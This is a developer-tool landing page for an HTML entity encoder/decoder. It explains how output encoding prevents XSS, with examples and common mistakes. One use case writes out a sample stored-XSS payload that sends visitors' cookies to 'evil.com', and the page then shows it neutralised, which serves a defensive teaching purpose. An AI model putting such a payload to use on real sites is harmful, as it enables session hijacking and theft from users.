Developer Tools
Verified Tool

HTML Entity Encoder/Decoder

Convert special characters to HTML entities and back

Start Using HTML Entity Encoder/Decoder Now
Free Forever No Signup
Last Updated: March 2, 2026
avatarBy Viblaa Team

Named and numeric entities

Real-time conversion

Copy to clipboard

Bidirectional encoding

You paste user-submitted content into your HTML page. The site breaks. The layout is destroyed. Worse—someone has injected JavaScript that redirects visitors to a malicious site. All because a single <script> tag slipped through unencoded.

HTML entity encoding is the first line of defense against XSS attacks and broken layouts. This tool converts dangerous characters to their safe equivalents instantly—protecting your site and your users.

What is HTML Entity Encoding?

HTML Entity Encoding converts special characters into their HTML entity equivalents. Characters like <, >, &, and quotes have special meaning in HTML—encoding them ensures browsers display them as text rather than interpreting them as code.

Common conversions:

<  →  &lt;
>  →  &gt;
&  →  &amp;
"  →  &quot;
'  →  &#39;
The Security Essential

Every time you display user-generated content, you should encode it. This single practice prevents the majority of XSS (Cross-Site Scripting) attacks—the most common web vulnerability.

Why People Actually Need This Tool

XSS Remains the #1 Web Vulnerability

Despite decades of awareness, Cross-Site Scripting consistently ranks in the OWASP Top 10. Proper encoding is the primary defense, yet many developers still overlook it.

  1. Preventing XSS attacks — Stop malicious scripts from executing in user browsers by encoding all untrusted content.

  2. Displaying code snippets — Show HTML/JavaScript code on web pages without the browser trying to execute it.

  3. Email templates — Ensure special characters render correctly across all email clients.

  4. CMS content — Safely display user-submitted blog posts, comments, and forum content.

  5. API responses — Encode data before sending to prevent injection when rendered by clients.

  6. Documentation — Write technical docs that include code examples without breaking page layout.

  7. RSS/XML feeds — Ensure content is valid XML by encoding reserved characters.

How to Use the HTML Encoder/Decoder

  1. Paste your text — Enter the content containing special characters.

  2. Click Encode or Decode — Transform characters to entities or back to original.

  3. Copy the result — Use the encoded string safely in your HTML.

  4. Choose encoding mode — Select named entities (&lt;) or numeric (&#60;).

CharacterNamed EntityNumeric EntityWhen to Encode
<&lt;&#60;Always
>&gt;&#62;Always
&&amp;&#38;Always
"&quot;&#34;In attributes
'&#39;&#39;In attributes
(nbsp)&nbsp;&#160;Preserve spaces
Context Matters

HTML encoding protects HTML context only. For JavaScript strings, URLs, or CSS, you need different encoding. Using the wrong encoding in the wrong context still leaves you vulnerable.

Real-World Use Cases

1. The Comment Section Vulnerability

Context: A blog displays user comments directly on the page without encoding.

Problem: A malicious user submits: <script>document.location='http://evil.com/steal?cookie='+document.cookie</script>

Solution: Encoding converts this to harmless text: &lt;script&gt;document.location=...&lt;/script&gt;

Outcome: The attack is neutralized. Visitors see the code as text instead of executing it.

2. The Code Tutorial

Context: A developer writes a tutorial showing how to create HTML buttons.

Problem: Typing <button>Click Me</button> creates an actual button instead of displaying the code.

Solution: Encode to &lt;button&gt;Click Me&lt;/button&gt; so readers see the code example.

Outcome: Tutorial displays properly without unintended rendering.

3. The Email Template Edge Case

Context: An e-commerce platform sends order confirmation emails with product descriptions.

Problem: A product named "Tom & Jerry Kids' Toys" displays as "Tom Jerry Kids Toys" in some email clients.

Solution: Encode as "Tom & Jerry Kids' Toys" for universal compatibility.

Outcome: Product names display correctly across Gmail, Outlook, Apple Mail, and others.

4. The Search Results Display

Context: A search engine displays page titles that include special characters.

Problem: A page titled "C++ > Java: Why Programmers Disagree" breaks the HTML layout.

Solution: Encode the title: "C++ > Java: Why Programmers Disagree"

Outcome: Search results render cleanly without layout issues.

5. The JSON in HTML Attribute

Context: A React app passes JSON data to a custom attribute for client-side JavaScript.

Problem: The attribute data-config with JSON value containing an apostrophe breaks the HTML.

data-config='{"name":"O'Brien"}'

Solution: Encode the apostrophe in the value:

data-config='{"name":"O&#39;Brien"}'

Outcome: Data passes correctly and JavaScript parses it without errors.

6. The Legacy Database Migration

Context: Migrating old database content that was stored without encoding to a modern CMS.

Problem: Thousands of records contain unescaped HTML that could break the new site.

Solution: Batch encode all text fields before import, converting dangerous characters to entities.

Outcome: Clean migration without breaking the new site or creating vulnerabilities.

7. The API Documentation

Context: Auto-generated API docs include example payloads with XML/JSON.

Problem: Example: <user><name>John</name></user> disappears because the browser treats it as HTML.

Solution: Encode examples: &lt;user&gt;&lt;name&gt;John&lt;/name&gt;&lt;/user&gt;

Outcome: Documentation displays all code examples correctly.

Common Mistakes and How to Avoid Them

Double Encoding is Also a Bug

Encoding already-encoded content creates ugly output like &amp;lt; instead of &lt;. Encode once, at the point of output, not multiple times through the pipeline.

Encoding User Input at the Wrong Time
❌ The Mistake
Encoding data when storing in the database, then encoding again when displaying—resulting in double-encoded garbage like `&amp;`.
âś… The Fix
Store data in its original form. Encode only at the moment of output, based on the output context (HTML, JavaScript, URL, etc.).
Using HTML Encoding for JavaScript Context
❌ The Mistake
Placing user data in JavaScript with only HTML encoding: `var name = '<script>';` The browser decodes entities before JavaScript executes.
âś… The Fix
Use JavaScript encoding (JSON.stringify or proper escaping) for data in JavaScript contexts, not HTML encoding.
Forgetting Attribute Context
❌ The Mistake
Encoding angle brackets but forgetting quotes in attributes, causing broken HTML when attribute values contain quote characters.
âś… The Fix
Always encode quotes (" or ') when content appears in HTML attributes.
Relying on Blacklists Instead of Encoding
❌ The Mistake
Trying to strip script tags while allowing other HTML. Attackers always find bypass techniques.
âś… The Fix
Encode everything by default. If you need to allow some HTML, use a whitelist sanitizer library that's actively maintained.
Encoding Content in the Wrong Direction
❌ The Mistake
Decoding user-submitted content that was already safely encoded, reintroducing XSS vulnerabilities.
âś… The Fix
Never decode untrusted content. If you must process it, decode then re-encode, or better—work with encoded form throughout.

Privacy and Data Handling

This HTML Encoder/Decoder operates entirely in your browser. Your content stays private.

  • No text is sent to any server.
  • No data is stored or logged.
  • No account required.
  • Works completely offline.

Whether you're encoding sensitive user data or proprietary code, it never leaves your device.

Conclusion

HTML entity encoding is one of those unglamorous essentials that prevents catastrophic failures. Every unencoded < is a potential XSS attack waiting to happen. Every unencoded & is a broken layout waiting to surprise you.

This tool makes encoding instant and error-free. Whether you're securing a production application, writing documentation, or debugging display issues, get the right encoded output every time.

Security doesn't have to be complicated. Sometimes it's just replacing five characters with their safe equivalents.

Frequently Asked Questions